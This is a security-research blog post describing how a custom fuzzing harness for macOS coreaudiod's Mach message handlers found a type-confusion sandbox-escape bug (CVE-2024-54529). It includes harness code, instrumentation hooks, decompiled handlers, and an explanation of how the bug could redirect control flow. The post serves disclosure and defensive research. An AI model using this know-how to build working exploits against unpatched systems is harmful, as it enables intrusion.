Guest post by Dillon Franke, Senior Security Engineer, 20% time on Project Zero Every second, highly-privileged MacOS system daemons accept and process hundreds of IPC messages. In some cases, these message handlers accept data from sandboxed or unprivileged processes. In this blog post, I’ll explore using Mach IPC messages as an attack vector to find and exploit sandbox escapes. I’ll detail how I used a custom fuzzing harness, dynamic instrumentation, and plenty of debugging/static analysis to identify a high-risk type confusion vulnerability in the coreaudiod system daemon. Along the way, I’ll discuss some of the difficulties and tradeoffs I encountered. Transparently, this was my first venture into the world of MacOS security research and building a custom fuzzing harness. I hope this post serves as a guide to those who wish to embark on similar research endeavors. I am open-sourcing the fuzzing harness I built, as well as several tools I wrote that were useful to me throughout this project. All of this can be found here: https://github.com/googleprojectzero/p0tools/tree/master/CoreAudioFuzzThe Approach: Knowledge-Driven Fuzzing For this research project, I adopted a hybrid approach that combined fuzzing and manual reverse engineering, which I refer to as knowledge-driven fuzzing. This method, learned from my friend Ned Williamson, balances automation with targeted investigation. Fuzzing provided the means to quickly test a wide range of inputs and identify areas where the system’s behavior deviated from expectations. However, when the fuzzer’s code coverage plateaued or specific hurdles arose, manual analysis came into play, forcing me to dive deeper into the target’s inner workings. Knowledge-driven fuzzing offers two key advantages. First, the research process never stagnates, as the goal of improving the code coverage of the fuzzer is always present. Second, achieving this goal requires a deep understanding of the code you are fuzzing. By the time you begin triaging legitimate, security-relevant crashes, the reverse engineering process will have given you extensive knowledge of the codebase, enabling analysis of crashes from an informed perspective. The cycle I followed during this research is as follows:Identify an attack vectorChoose a targetCreate a fuzzing harnessFuzz and produce crashes Analyze crashes and code coverage      Iterate on the fuzzing harnessRepeat steps 4-6  Identify an Attack Vector Standard browser sandboxing limits code execution by restricting direct operating system access. Consequently, exploiting a browser vulnerability typically requires the use of a separate “sandbox escape” vulnerability. Since interprocess communication (IPC) mechanisms allow two processes to communicate with each other, they can naturally serve as a bridge from a sandboxed process to an unrestricted one. This makes them a prime attack vector for sandbox escapes, as shown below. I chose Mach messages, the lowest level IPC component in the MacOS operating system, as the attack vector of focus for this research. I chose them mostly due to my desire to understand MacOS IPC mechanisms at their most core level, as well as the track record of historical security issues with Mach messages.Previous Work and Background Leveraging Mach messages in exploit chains is far from a novel idea. For example, Ian Beer identified a core design issue in 2016 with the XNU kernel related to the handling of task_t Mach ports, which allowed for exploitation via Mach messages. Another post showed how an in-the-wild exploit chain utilized Mach messages in 2019 for heap grooming techniques. I also drew much inspiration from Ret2 Systems’ blog post about leveraging Mach message handlers to find and weaponize a Safari sandbox escape. I won’t spend too much time detailing the ins and outs of how Mach messages work, (that is better left to a more comprehensive post on the subject) but here’s a brief overview of Mach IPC for this blog post:Mach messages are stored within kernel-managed message queues, represented by a Mach portA process can fetch a message from a given port if it holds the receive right for that portA process can send a message to a given port if it holds a send right to that port MacOS applications can register a service with the bootstrap server, a special mach port which all processes have a send right to by default. This allows other processes to send a Mach message to the bootstrap server inquiring about a specific service, and the bootstrap server can respond with a send right to that service’s Mach port. MacOS system daemons register Mach services via launchd. You can view their .plist files within the /System/Library/LaunchAgents and /System/Library/LaunchDaemons directories to get an idea of the services registered. For example, the .plist file below highlights a Mach service registered for the Address Book application on MacOS using the identifier com.apple.AddressBook.AssistantService.         POSIXSpawnType         Adaptive         Label         com.apple.AddressBook.AssistantService         MachServices                          com.apple.AddressBook.AssistantService                                   ProgramArguments                          /System/Library/Frameworks/AddressBook.framework/Versions/A/Helpers/ABAssistantService.app/Contents/MacOS/ABAssistantService          Choose a Target After deciding I wanted to research Mach services, the next question was which service to target. In order for a sandboxed process to send Mach messages to a service, it has to be explicitly allowed. If the process is using Apple’s App Sandbox feature, this is done within a .sb file, written using the TinyScheme format. The snippet below shows an excerpt of the sandbox file for a WebKit GPU Process. The allow mach-lookup directive is used to allow a sandboxed process to lookup and send Mach messages to a service. # File: /System/Volumes/Preboot/Cryptexes/Incoming/OS/System/Library/Frameworks/WebKit.framework/Versions/A/Resources/com.apple.WebKit.GPUProcess.sb (with-filter (system-attribute apple-internal)     (allow mach-lookup         (global-name "com.apple.analyticsd")         (global-name "com.apple.diagnosticd"))) (allow mach-lookup        (global-name "com.apple.audio.audiohald")        (global-name "com.apple.CARenderServer")        (global-name "com.apple.fonts")        (global-name "com.apple.PowerManagement.control")        (global-name "com.apple.trustd.agent")        (global-name "com.apple.logd.events")) This helped me narrow my focus significantly from all MacOS processes, to processes with a sandbox-accessible Mach service: In addition to inspecting the sandbox profiles, I used Jonathan Levin’s sbtool utility to test which Mach services could be interacted with for a given process. The tool (which was a bit outdated, but I was able to get it to compile) uses the builtin sandbox_exec function under the hood to provide a nice list of accessible Mach service identifiers: ❯ ./sbtool 2813 mach com.apple.logd com.apple.xpc.smd com.apple.remoted com.apple.metadata.mds com.apple.coreduetd com.apple.apsd com.apple.coreservices.launchservicesd com.apple.bsd.dirhelper com.apple.logind com.apple.revision …Truncated… Ultimately, I chose to take a look at the coreaudiod daemon, and specifically the com.apple.audio.audiohald service for the following reasons:It is a complex processIt allows Mach communications from several impactful applications, including the Safari GPU processThe Mach service had a large number of message handlersThe service seemed to allow control and and modification of audio hardware, which would likely require elevated privilegesThe coreaudiod binary and the CoreAudio Framework it heavily uses were both closed source, which would provide a unique reverse engineering challengeCreate a Fuzzing Harness Once I chose an attack vector and target, the next step was to create a fuzzing harness capable of sending input through the attack vector (a Mach message) at a proper location within the target. A coverage-guided fuzzer is a powerful weapon, but only if its energy is focused in the right place—like a magnifying glass concentrating sunlight to start a fire. Without proper focus, the energy dissipates, achieving little impact.Determining an Entry Point Ideally, a fuzzer should perfectly replicate the environment and capabilities available to a potential attacker. However, this isn't always practical. Trade-offs often need to be made, such as accepting a higher rate of false positives for increased performance, simplified instrumentation, or ease of development. Therefore, identifying the “right place” to fuzz is highly dependent on the specific target and research goals.Option 1: Interprocess Fuzzing All Mach messages are sent and received using the mach_msg API, as shown below. Therefore, I thought the most intuitive way to fuzz coreaudiod‘s Mach message handlers would be to write a fuzzing harness that called the mach_msg API and allow my fuzzer to modify the message contents to produce crashes. The approach would look something like this: However, this approach had a large downside: since we were sending IPC messages, the fuzzing harness would be in a different process space than the target. This meant code coverage information would need to be shared across a process boundary, which is not supported by most fuzzing tools. Additionally, kernel message queue processing adds a significant performance overhead. Option 2: Direct Harness While requiring a bit more work up front, another option was to write a fuzzing harness that directly loaded and called the Mach message handlers of interest. This would have the massive advantage of putting our fuzzer and instrumentation in the same process as the message handlers, allowing us to more easily obtain code coverage. One notable downside of this fuzzing approach is that it assumes all fuzzer-generated inputs pass the kernel’s Mach message validation layer, which in a real system occurs before a message handler gets called. As we’ll see later, this is not always the case. In my view, however, the pros of fuzzing in the same process space (speed and easy code coverage collection) outweighed the cons of a potential increase in false positives. The approach would be as follows:Identify a suitable function for processing incoming mach messagesWrite a fuzzing harness to load the message handling code from coreaudiod Use a fuzzer to generate inputs and call the fuzzing harnessProfit, hopefullyFinding the Mach Messager Handler To start, I searched for the Mach service identifier, com.apple.audioaudiohald, but found no references to it within the coreaudiod binary. Next, I checked the libraries it loaded using otool. Logically, the CoreAudio framework seemed like a good candidate for housing the code for our message handler. $ otool -L /usr/sbin/coreaudiod /usr/sbin/coreaudiod:         /System/Library/PrivateFrameworks/caulk.framework/Versions/A/caulk (compatibility version 1.0.0, current version 1.0.0)         /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio (compatibility version 1.0.0, current version 1.0.0)         /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation (compatibility version 150.0.0, current version 2602.0.255)         /usr/lib/libAudioStatistics.dylib (compatibility version 1.0.0, current version 1.0.0, weak)         /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation (compatibility version 300.0.0, current version 2602.0.255)         /usr/lib/libobjc.A.dylib (compatibility version 1.0.0, current version 228.0.0)         /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 1700.255.5)         /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1345.120.2) However, I was surprised to find that the path returned by otool did not exist! $ stat /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio stat: /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio: stat: No such file or directoryThe Dyld Shared Cache A bit of research showed me that as of MacOS Big Sur, most framework binaries are not stored on disk but within the dyld shared cache, a mechanism for pre-linking libraries to allow applications to run faster. Thankfully, IDA Pro, Binary Ninja, and Ghidra support parsing the dyld shared cache to obtain the libraries stored within. I also used this helpful tool to successfully extract libraries for additional analysis. Once I had the CoreAudio Framework within IDA, I quickly found a call to bootstrap_check_in with the service identifier passed as an argument, proving the CoreAudio framework binary was responsible for setting up the Mach service I wanted to fuzz. However, it still wasn’t obvious where the message handling code was happening, despite quite a bit of reverse engineering. It turns out this is due to the use of the Mach Interface Generator, (MIG) an Interface Definition Language from Apple that makes it easier to write RPC clients and servers by abstracting away much of the Mach layer. When compiled, MIG message handling code gets bundled into a structure called a subsystem. One can easily grep for these subsystems to find their offsets: $ nm -m ./System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio | grep -i subsystem                  (undefined) external _CACentralStateDumpRegisterSubsystem (from AudioToolboxCore) 00007ff840470138 (__DATA_CONST,__const) non-external _HALC_HALB_MIGClient_subsystem 00007ff840470270 (__DATA_CONST,__const) non-external _HALS_HALB_MIGServer_subsystem Next, I searched in IDA for cross-references to the _HALS_HALB_MIGServer_subsystem symbol, which identified the MIG server function that parsed incoming Mach messages! The routine is shown below, with the first parameter (the rdi register) being the incoming Mach message and the second (the rsi register) being the message to return to the client. The MIG server function extracted the msgh_id parameter from the Mach message and used that to index into the MIG subsystem. Then, the necessary function handler was called. I further confirmed this by setting an LLDB breakpoint on the coreaudiod process (after disabling SIP) for the _HALB_MIGServer_server function. Then, I adjusted the volume on my system, and the breakpoint was hit: In this example, tracing the message handler called from the MIG subsystem showed the _XObject_HasProperty function was called based on the Mach message’s msgh_id. Depending on the msgh_id, a few dozen message handlers were accessible from the MIG subsystem. They are easily identifiable by the convenient __X prefix to their function names added by MIG. The _HALB_MIGServer_server function struck a great balance between getting close to low-level message handling code while still resembling the inputs that a call to mach_msg would take. I decided this was the place to inject fuzz input into.Creating a Basic Fuzzing Harness After identifying the function I wanted to fuzz, the next step was to write a program to read a file and deliver the file’s contents as input to the target function. This might have been as easy as linking the CoreAudio library with my fuzzing harness and calling the _HALB_MIGServer_server function, but unfortunately the function was not exported. Instead, I borrowed some logic from Ivan Fratric and his TinyInst tool (we’ll be talking about it a lot more later) which returns a provided symbol’s address from a library. The code parses the structure of Mach-O binaries, specifically their headers and load commands, to locate and extract symbol information. This made it possible to resolve and call the target function in my fuzzing harness, even when it wasn’t exported. So, the high level function of my harness was as follows:Load the CoreAudio LibraryGet a function pointer for the target function from the CoreAudio LibraryRead an input from a fileCall the target function with the input The full implementation of my fuzzing harness can be found here. An example of invoking the harness to send a message from an input file is shown below: $ ./harness -f corpora/basic/1 -v *******NEW MESSAGE******* Message ID: 1010000 (XSystem_Open) ------ MACH MSG HEADER ------ msg_bits: 2319532353 msg_size: 56 msg_remote_port: 1094795585 msg_local_port: 1094795585 msg_voucher_port: 1094795585 msg_id: 1010000 ------ MACH MSG BODY (32 bytes) ------ 0x01 0x00 0x00 0x00 0x03 0x30 0x00 0x00 0x41 0x41 0x41 0x41 0x41 0x41 0x11 0x00 0x41 0x41 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00   ------ MACH MSG TRAILER ------ msg_trailer_type: 0 msg_trailer_size: 32 msg_seqno: 0 msg_sender: 0 ------ MACH MSG TRAILER BODY (32 bytes) ------ 0xf5 0x01 0x00 0x00 0xf5 0x01 0x00 0x00 0x14 0x00 0x00 0x00 0xf5 0x01 0x00 0x00 0x14 0x00 0x00 0x00 0x7e 0x02 0x00 0x00 0xa3 0x86 0x01 0x00 0x4f 0x06 0x00 0x00  Processing function result: 1 *******RETURN MESSAGE******* ------ MACH MSG HEADER ------ msg_bits: 1 msg_size: 36 msg_remote_port: 1094795585 msg_local_port: 0 msg_voucher_port: 0 msg_id: 1010100 ------ MACH MSG BODY (12 bytes) ------ 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 Harvesting Legitimate Mach Messages I now had a way to deliver data directly into the MIG subsystem (_HALB_MIGServer_server) I wanted to fuzz. However, I had no idea the specific message size, options, or data the handler was expecting. While a coverage-guided fuzzer will begin to uncover the proper message format over time, it is advantageous to obtain a seed corpus of legitimate inputs when first beginning to fuzz to improve efficiency. To do this, I used LLDB to set a breakpoint on the MIG subsystem and dump the first argument (containing the incoming Mach message). Then, I played around with the operating system to cause Mach messages to be sent to coreaudiod. The Audio MIDI Setup MacOS application ended up being great for this, as it allows one to create, edit, and delete audio devices. Fuzz and Produce Crashes Armed with a small seed corpus and an input delivery mechanism, the next step was to configure a fuzzer to use the created fuzzing harness and obtain code coverage. I used the excellent Jackalope fuzzer built and maintained by Ivan Fratric. I chose Jackalope primarily for its high level of customizability—it allows easy implementation of custom mutators, instrumentation, and sample delivery. Additionally, I appreciated its seamless usage on macOS, particularly its code coverage capabilities powered by TinyInst. In contrast, I tried and failed to collect code coverage using Frida against system daemons on macOS. I used the following command to start a Jackalope fuzzing run: $ jackalope -in in/ -out out/ -delivery file -instrument_module CoreAudio -target_module harness -target_method _fuzz -nargs 1 -iterations 1000 -persist -loop -dump_coverage -cmp_coverage -generate_unwind -nthreads 5 -- ./harness -f @@Iterate on the Fuzzing Harness This harness quickly generated many crashes, a sign I was on the right track. However, I quickly learned that initial crashes are often not indicative of a security bug, but of a design bug in the fuzzing harness itself or an invalid assumption.Iteration 1: Target Initialization One of the difficulties with my fuzzing approach was that my target function (the Mach message handler) expected the HAL system to be in a specific state to begin receiving Mach messages. By simply calling the library function with my fuzzing harness, these assumptions were broken. This caused errors to start popping up. As shown in the diagram below, the harness bypassed much of the bootstrapping functionality the coreaudiod process would normally take care of during startup. Code coverage, as well as error messages, can be very helpful in helping determine some of the initialization steps a fuzzing harness is neglecting. For example, I noticed my data flow would always fail early in most Mach message handlers, logging the message Error: there is no system. It turns out I needed to initialize the HAL System before I could interact correctly with the Mach APIs. In my case, calling the _AudioHardwareStartServer function in my fuzzing harness took care of most of the necessary initialization.Iteration 2: API Call Chaining My first crack at a fuzzing harness was cool, but it made a pretty large assumption: all accessible Mach message handlers functioned independently of each other. As I quickly learned, this assumption was incorrect. As I ran the fuzzer, error messages like the following one started popping up: The error seemed to indicate the SetPropertyData Mach handler was expecting a client to be registered via a previous Mach message. Clearly, the Mach handlers I was fuzzing were stateful and depended on each other to function properly. My fuzzing harness would need to take this into consideration in order to have any hope of obtaining good code coverage on the target. This highlights a common problem in the fuzzing world: most coverage-guided fuzzers accept a single input, (a bunch of bytes) while many things we want to fuzz accept data in a completely different format, such as several arguments of different types, or even several function calls. This Google writeup explains the problem well, as does Ned Williamson’s OffensiveCon Talk from 2019. To get around this limitation, we can use a technique I refer to as API Call Chaining, which considers each fuzz input as a stream that can be read from to craft multiple valid inputs. Thus, each fuzzing iteration would be capable of generating multiple Mach messages. This simple but important insight allows a fuzzer to explore the interdependency of separate function calls using the same code-coverage informed input. The FuzzedDataProvider class, which is part of LibFuzzer but can be included as a header for use with any fuzzing harness, is a great choice for consuming a fuzz sample and transforming it into a more meaningful data type. Consider the following pseudocode: extern "C" int LLVMFuzzerTestOneInput(const uint8_t* data, size_t size) {     FuzzedDataProvider fuzz_data(data, size); // Initialize FDP     while (fuzz_data.remaining_bytes() >= MACH_MSG_MIN_SIZE) { // Continue until we've consumed all bytes         uint32_t msg_id = fuzz_data.ConsumeIntegralInRange(1010000, 1010062);         switch (msg_id) {             case '1010000': {                 send_XSystem_Open_msg(fuzz_data);             }             case '1010001': {                 send_XSystem_Close_msg(fuzz_data);             }             case '1010002': {                 send_XSystem_GetObjectInfo_msg(fuzz_data);             }             ... continued         }      } } This code transforms a blob of bytes into a mechanism that can repeatedly call APIs with fuzz data in a deterministic manner. What’s more, a coverage-guided fuzzer will be able to explore and identify a series of API calls that improves code coverage. From the fuzzer’s perspective, it is simply modifying an array of bytes, blissfully unaware of the additional complexity happening under the hood. For example, my fuzzer quickly identified that most interactions with the audiohald service required a call to the _XSystem_Open message handler to register a client before most APIs could be called. The inputs the fuzzer saved to its corpus naturally reflected this fact over time.Iteration 3: Mocking Out Buggy/Unneeded Functionality Sometimes coverage plateaus, and a fuzzer struggles to explore new code paths. For example, say we’re fuzzing an HTTP server and it keeps getting stuck because it’s trying to read and parse configuration files on startup. If our focus was on the server’s request parsing and response logic, we might choose to mock out the functionality we don’t care about in order to focus the fuzzer’s code coverage exploration elsewhere. In my fuzzing harness’ case, calling the initialization routines was causing my harness to try to register the com.apple.audio.audiohald Mach service with the bootstrap server, which was throwing an error because it was already registered by launchd. Since my harness didn’t need to register the Mach service in order to inject messages, (remember, our harness calls the MIG subsystem directly) I decided to mock out the functionality. When dealing with pure C functions, function interposing can be used to easily modify a function’s behavior. In the example below, I declare a new version of the bootstrap_check_in function that just says returns KERN_SUCCESS, effectively nopping it out while telling the caller that it was successful. #include  #include  // Forward declaration for bootstrap_check_in kern_return_t bootstrap_check_in(mach_port_t bootstrap_port, const char *service_name, mach_port_t *service_port); // Custom implementation of bootstrap_check_in kern_return_t custom_bootstrap_check_in(mach_port_t bootstrap_port, const char *service_name, mach_port_t *service_port) {     // Ensure service_port is non-null and set it to a non-zero value     if (service_port) {         *service_port = 1;  // Set to a non-zero value     }     return KERN_SUCCESS;  // Return 0 (KERN_SUCCESS) } // Interposing array for bootstrap_check_in __attribute__((used)) static struct {     const void* replacement;     const void* replacee; } interposers[] __attribute__((section("__DATA,__interpose"))) = {     { (const void *)custom_bootstrap_check_in, (const void *)bootstrap_check_in } }; In the case of C++ functions, I used TinyInst’s Hook API to modify problematic functionality. In one specific scenario, my fuzzer was crashing the target constantly because the CFRelease function was being called with a NULL pointer. Some further analysis told me that this was a non-security relevant bug where a user’s input, which was assumed to contain a valid plist object, was not properly validated. If the plist object was invalid or NULL, a downstream function call would contain NULL, and an abort would occur. So, I wrote the following TinyInst hook, which checked whether the plist object passed into the function was NULL. If so, my hook returned the function call early, bypassing the buggy code. void HALSWriteSettingHook::OnFunctionEntered() {     printf("HALS_SettingsManager::_WriteSetting Entered\n");     if (!GetRegister(RDX)) {         printf("NULL plist passed as argument, returning to prevent NULL CFRelease\n");         printf("Current $RSP: %p\n", GetRegister(RSP));         void *return_address;                 RemoteRead((void*)GetRegister(RSP), &return_address, sizeof(void *));         printf("Current return address: %p\n", GetReturnAddress());         printf("Current $RIP: %p\n", GetRegister(RIP));         SetRegister(RAX, 0);         SetRegister(RIP, GetReturnAddress());         printf("$RIP register is now: %p\n", GetRegister(ARCH_PC));         SetRegister(RSP, GetRegister(RSP) + 8); // Simulate a ret instruction         printf("$RSP is now: %p\n", GetRegister(RSP));     } } Next, I modified Jackalope to use my instrumentation using the CreateInstrumentation API. That way, my hook was applied during each fuzzing iteration, and the annoying NULL CFRelease calls stopped happening. The output below shows the hook preventing a crash from a NULL plist object passed the troublesome API: Instrumented module CoreAudio, code size: 7516156 Hooking function __ZN11HALS_System13_WriteSettingEP11HALS_ClientPK10__CFStringPKv in module CoreAudio HALS_SettingsManager::_WriteSetting Entered NULL plist passed as argument, returning to prevent NULL CFRelease Current $RSP: 0x7ff7bf83b358 Current return address: 0x7ff8451e7430 Current $RIP: 0x7ff84533a675 $RIP register is now: 0x7ff8451e7430 $RSP is now: 0x7ff7bf83b360 Total execs: 6230 Unique samples: 184 (0 discarded) Crashes: 3 (2 unique) Hangs: 0 Offsets: 13550 Execs/s: 134 The code to reproduce and build this fuzzer with custom instrumentation can be found here: https://github.com/googleprojectzero/p0tools/tree/master/CoreAudioFuzz/jackalope-modificationsIteration 4: Improving Sample Structure The great thing about a fuzzing-centric auditing technique is that it highlights knowledge gaps in the code you are auditing. As you address these gaps, you gain a deeper understanding of the structure and constraints of the inputs that your fuzzing harness should generate. These insights enable you to refine your harness to produce more targeted inputs, effectively penetrating deeper code paths and improving overall code coverage. The following subsections highlight examples of how I identified and implemented opportunities to iterate on my fuzzing harness, significantly enhancing its efficiency and effectiveness.Message Handler Syntax Checks  Code coverage results from fuzzing runs are incredibly telling. I noticed that after running my fuzzer for a few days, it was having trouble exploring past the beginning of most of the Mach message handlers. One simple example is shown below, (explored basic blocks are highlighted in blue) where several comparisons were not being passed , causing the function to error out early on. Here, the rdi register is the incoming Mach message we sent to the handler. The comparisons were checking that the Mach message was well formatted, with a message length set to 0x34 and various options set within the message. If it wasn’t, it was discarded. With this in mind, I modified my fuzzing harness to set the fields in the Mach messages I sent to the _XIOContext_SetClientControlPort handler such that they passed these conditions. The fuzzer could modify other pieces of the message as it pleased, but since these aspects needed to conform to strict guidelines, I simply hardcoded them. These small modifications were the beginning of an input structure I was building for my target. The efficiency of my fuzzing improved astronomically after adding these guidelines to the fuzzer - my code coverage increased by 2000% shortly thereafter.Out-of-Line (OOL) Message Data I noticed my fuzzing setup started generating tons of crashes from a call to mig_deallocate, which frees a given address. At first, I thought I had found an interesting bug, since I could control the address passed to mig_deallocate: I quickly learned, however, that Mach messages can contain various types of Out-of-line (OOL) data. This allows a client to allocate a memory region and place a pointer to it within the Mach message, which will be processed and, in some cases, freed by the message handler. When sending a Mach message with the mach_msg API, the XNU kernel will validate that the memory pointed to by OOL descriptors is properly owned and accessible by the client process. I hadn’t found a vulnerability; my fuzzing harness was simply attached to the target at a point downstream which bypassed the normal memory checks that would have been performed by the kernel. To remedy this, I modified my fuzzing harness to support allocating space for OOL data and passing the valid memory address within the Mach messages I fuzzed.The Vulnerability After many fuzzing harness iterations, lldb “next instruction” commands, and hours spent overheating my MacBook Pro, I had finally begun to acquire an understanding of the CoreAudio framework and generate some meaningful crashes. But first, some background knowledge.The Hardware Abstraction Layer (HAL) The com.apple.audio.audiohald Mach service exposes an interface known as the Hardware Abstraction Layer (HAL). The HAL allows clients to interact with audio devices, plugins, and settings on the operating system, represented in the coreaudiod process as C++ objects of type HALS_Object. In order to interact with the HAL, a client must first register itself. There are a few ways to do this, but the simplest is using the _XSystem_Open Mach API. Calling this API will invoke the HALS_System::AddClient method, which uses the Mach message’s audit token to create a client (clnt) HALS_Object to map subsequent requests to that client. The code block below shows an IDA decompilation snippet of the creation of a clnt object. v85[0] = v5 != 0;   v28 = v83[0];   v29 = 'clnt';   HALS_Object::HALS_Object((HALS_Object *)v13, 'clnt', 0, (__int64)v83[0], v30);   *(_QWORD *)v13 = &unk_7FF850E56640;   *(_OWORD *)(v13 + 72) = 0LL;   *(_OWORD *)(v13 + 88) = 0LL;   *(_DWORD *)(v13 + 104) = 1065353216; Stepping into the HALS_Object constructor, a mutex is acquired before getting the next available object ID before making a call to HALS_ObjectMap::MapObject. void __fastcall HALS_Object::HALS_Object(HALS_Object *this, _BOOL4 a2, unsigned int a3, __int64 a4, HALS_Object *a5) {   unsigned int v5; // r12d   HALB_Mutex::Locker *v6; // r15   unsigned int v7; // ebx   HALS_Object *v8; // rdx   int v9; // eax   v5 = a3;   *(_QWORD *)this = &unk_7FF850E7C200;   *((_DWORD *)this + 2) = 0;   *((_DWORD *)this + 3) = HALB_MachPort::CreatePort(0LL, a2, a3);   *((_WORD *)this + 8) = 257;   *((_WORD *)this + 10) = 1;   pthread_once(&HALS_ObjectMap::sObjectInfoListInitialized, HALS_ObjectMap::Initialize);   v6 = HALS_ObjectMap::sObjectInfoListMutex;   HALB_Mutex::Lock(HALS_ObjectMap::sObjectInfoListMutex);   v7 = (unsigned int)HALS_ObjectMap::sNextObjectID;   LODWORD(HALS_ObjectMap::sNextObjectID) = (_DWORD)HALS_ObjectMap::sNextObjectID + 1;   HALB_Mutex::Locker::~Locker(v6);   *((_DWORD *)this + 6) = v7;   *((_DWORD *)this + 7) = a2;   if ( !v5 )     v5 = a2;   *((_DWORD *)this + 8) = v5;   if ( a4 )     v9 = *(_DWORD *)(a4 + 24);   else     v9 = 0;   *((_DWORD *)this + 9) = v9;   *((_QWORD *)this + 5) = &stru_7FF850E86420;   *((_BYTE *)this + 48) = 0;   *((_DWORD *)this + 13) = 0;   HALS_ObjectMap::MapObject((HALS_ObjectMap *)v7, (__int64)this, v8); } The HALS_ObjectMap::MapObject function adds the freshly allocated object to a linked list stored on the heap. I wrote a program using the TinyInst Hook API that iterates through each object in the list and dumps its raw contents: To modify an existing HALS_Object, most of the HAL Mach message handlers use the HALS_ObjectMap::CopyObjectByObjectID function, which accepts an integer ID (parsed from the Mach message’s body) for a given HALS_Object, which it then looks up in the Object Map and returns a pointer to the object. For example, here’s a small snippet of the ​_XSystem_GetObjectInfo Mach message handler, which calls the HALS_ObjectMap::CopyObjectByObjectID function before accessing information about the object and returning it. HALS_Client::EvaluateSandboxAllowsMicAccess(v5);   v7 = (HALS_ObjectMap *)HALS_ObjectMap::CopyObjectByObjectID((HALS_ObjectMap *)v3);   v8 = v7;   if ( !v7 )   {     v13 = __cxa_allocate_exception(0x10uLL);     *(_QWORD *)v13 = &unk_7FF850E85518;     v13[2] = 560947818;     __cxa_throw(v13, (struct type_info *)&`typeinfo for'CAException, CAException::~CAException);   } An Intriguing Crash Whenever my fuzzer produced a crash, I always took the time to fully understand the crash’s root cause. Often, the crashes were not security relevant, (i.e. a NULL dereference) but fully understanding the reason behind the crash helped me understand the target better and invalid assumptions I was making with my fuzzing harness. Eventually, when I did identify security relevant crashes, I had a good understanding of the context surrounding them. The first indication from my fuzzer that a vulnerability might exist was a memory access violation during an indirect call instruction, where the target address was calculated using an index into the rax register. As shown in the following backtrace, the crash occurred shallowly within the _XIOContext_Fetch_Workgroup_Port Mach message handler. Further investigating the context of the crash in IDA, I noticed that the rax register triggering the invalid memory access was directly derived from a call to the HALS_ObjectMap::CopyObjectByObjectID function. Specifically, it attempted the following:Fetch a HALS_Object from the Object Map based on an ID provided in the Mach messageDereference the address a1 at offset 0x68 of the HALS_ObjectDereference the address a2 at offset 0x0 of a1Call the function pointer at offset 0x168 of a2What Went Wrong? The operations leading to the crash indicated that at offset 0x68 of the  HALS_Object it fetched, the code expected a pointer to an object with a vtable. The code would then look up a function within the vtable, which would presumably retrieve the object’s “workgroup port.” When the fetched object was of type ioct, (IOContext) everything functioned as normal. However, the test input my fuzzer generated was causing the function to fetch a HALS_Object of a different type, which led to an invalid function call. The following diagram shows how an attacker able to influence the pointer at offset 0x68 of a HALS_Object might hijack control flow. This vulnerability class is referred to as a type confusion, where the vulnerable code makes the assumption that a retrieved object or struct is a specific type, but it is possible to provide a different one. The object’s memory layout might be completely different, meaning memory accesses and vtable lookups might occur in the wrong place, or even out of bounds. Type confusion vulnerabilities can be extremely powerful due to their ability to form reliable exploits.Affected Functions The _XIOContext_Fetch_Workgroup_Port Mach message handler wasn’t the only function that assumed it was dealing with an ioct object without checking the type. The table below shows several other message handlers that suffered from the same issue: Mach Message Handler Affected Routine _XIOContext_Fetch_Workgroup_Port _XIOContext_Fetch_Workgroup_Port _XIOContext_Start ___ZNK14HALS_IOContext22HasEnabledInputStreamsEv_block_invoke _XIOContext_StartAtTime ___ZNK14HALS_IOContext16GetNumberStreamsEb_block_invoke _XIOContext_Start_With_WorkInterval ___ZNK14HALS_IOContext22HasEnabledInputStreamsEv_block_invoke _XIOContext_SetClientControlPort _XIOContext_SetClientControlPort _XIOContext_Stop _XIOContext_Stop Apple did perform proper type checking on some of the Mach message handlers. For example, the _XIOContent_PauseIO message handler, shown below, calls a function that checks whether the fetched object is of type ioct before using it. It is not clear why these checks were implemented in certain areas, but not others. The impact of this vulnerability can range from an information leak to control flow hijacking. In this case, since the vulnerable code is performing a function call, an attacker could potentially control the data at the offset read during the type confusion, allowing them to control the function pointer and redirect execution. Alternatively, if the attacker can provide an object smaller than 0x68 bytes, an out-of-bounds read would be possible, paving the way for further exploitation opportunities such as memory corruption or arbitrary code execution.Creating a Proof of Concept Because my fuzzing harness was connected downstream in the Mach message handling process, it was important to build an end-to-end proof-of-concept that used the mach_msg API to send a Mach message to the vulnerable message handler within coreaudiod. Otherwise, we might have triggered a false positive as we did in the case of the mig_deallocate crash where we thought we had a bug, but were actually just bypassing security checks. In this case, however, the bug was triggerable using the mach_msg API, making it a legitimate opportunity for use as a sandbox escape. The proof-of-concept code I put together for triggering this issue on MacOS Sequoia 15.0.1 can be found here. It’s worth noting that code running on Apple Silicon uses Pointer Authentication Codes (PACs) , which could make exploitation more difficult. In order to exploit this bug through an invalid vtable call, an attacker would need the ability to sign pointers, which would be possible if the attacker gained native code execution in an Apple-signed process. However, I only analyzed and tested this issue on x86-64 versions of MacOS.How Apple Fixed the Issue I reported this type confusion vulnerability to Apple on October 9, 2024. It was fixed on December 11, 2024, assigned CVE-2024-54529, and a patch was introduced in MacOS Sequoia 15.2, Sonoma 14.7.2, and Ventura 13.7.2. Interestingly, Apple mentions that the vulnerability allowed for code execution with kernel privileges. That part interested me, since as far as I could tell the execution was only possible as the _coreaudiod group, which was not equivalent to kernel privileges. Apple’s fix was simple: since each HALS Object contains information about its type, the patch adds a check within the affected functions to ensure the fetched object is of type ioct before dereferencing the object and performing a function call. You might have noticed how the offset derefenced within the HALS Object is 0x70 in the updated version, but was 0x68 in the vulnerable version. Often, such struct modifications are not security relevant, but will differ based on other bug fixes or added features.Recommendations To prevent similar type confusion vulnerabilities in the future, Apple should consider modifying the CopyObjectByObjectID function (or any others that make assumptions about an object’s type) to include a type check. This could be achieved by passing the expected object type as an argument and verifying the type of the fetched object before returning it. This approach is similar to how deserialization functions often include a template parameter to ensure type safety.Conclusion This blog post described my journey into the world of MacOS vulnerability research and fuzzing. I hope I have shown how a knowledge-driven fuzzing approach can allow rapid prototyping and iteration, a deep 